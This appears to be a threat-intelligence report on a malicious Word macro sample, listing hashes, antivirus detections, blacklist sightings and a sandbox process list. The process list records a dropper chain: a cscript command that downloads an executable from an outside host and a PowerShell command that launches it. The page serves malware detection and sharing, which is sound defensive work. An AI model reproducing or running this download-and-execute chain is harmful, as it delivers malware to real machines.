327c6d5487cfa96d71c67212d6e19011
Classification: Malicious
327c6d5487cfa96d71c67212d6e19011 is a malicious file sample. Reported by 2 threat sources, last seen 2026-09-02. Detected by 14 antivirus engines.
Detection summary
- 14 antivirus detections (22% detection ratio)
- 0 IDS alerts
- 5 processes observed
- 1 contacted hosts
- 1 DNS requests
Blacklist sightings
| Description |
Source |
First seen |
Last seen |
Labels |
MITRE ATT&CK |
| Generic Malware |
Cyber Threat Alliance |
2026-09-02 18:00:51 |
2026-09-02 18:00:51 |
malicious-activity
|
|
| Trojan.Generic |
Hybrid-Analysis |
2020-03-23 15:30:57 |
2020-03-23 15:30:57 |
|
|
Sample information
- Filenames
- 327c6d5487cfa96d71c67212d6e19011
- File type
- Microsoft Word 2007+
- Size
- 261259 bytes
- MD5
327c6d5487cfa96d71c67212d6e19011
- SHA-1
25fa932f085e354899d3f2c3c73ab7933f6dbcda
- SHA-256
4aae0d83b803f80da8841723184837badb9e969136a7013bd297a6ee0251b977
- First indexed
- 2020-03-23 15:30:57
- Last updated
- 2020-03-23 15:30:57
Antivirus detections
| Engine | Detection |
| MicroWorld-eScan | Trojan.GenericKDZ.58880 |
| BitDefender | Trojan.GenericKDZ.58880 |
| Arcabit | Trojan.Generic.DE600 |
| Endgame | malicious (high confidence) |
| FireEye | Trojan.GenericKDZ.58880 |
| Emsisoft | Trojan.GenericKDZ.58880 (B) |
| Cyren | PP97M/Agent.DL.gen!Eldorado |
| Microsoft | TrojanDropper:O97M/Powdow.ARJ!MTB |
| GData | Macro.Trojan.Agent.ARC |
| TACHYON | Suspicious/WOX.Obfus.Gen.5 |
| MAX | malware (ai score=88) |
| Ad-Aware | Trojan.GenericKDZ.58880 |
| Zoner | Probably W97Obfuscated |
| Fortinet | VBA/Agent.ARC!tr |
Process list
| Name | Command line |
| WINWORD.EXE | /n "C:\327c6d5487cfa96d71c67212d6e19011.doc" |
| cmd.exe | /c c:\Rewi_Cool\Personal.cmd |
| cscript.exe | cscript //nologo c:\Rewi_Cool\Holiher.vbs http://customscripts.us/ldr_2817175.exe C:\Rewi_Cool\Heri_();.exe |
| powershell.exe | powershell -C Sleep -s 7;Saps 'C:\Rewi_Cool\Heri_();.exe' |
| ntvdm.exe | -i1 |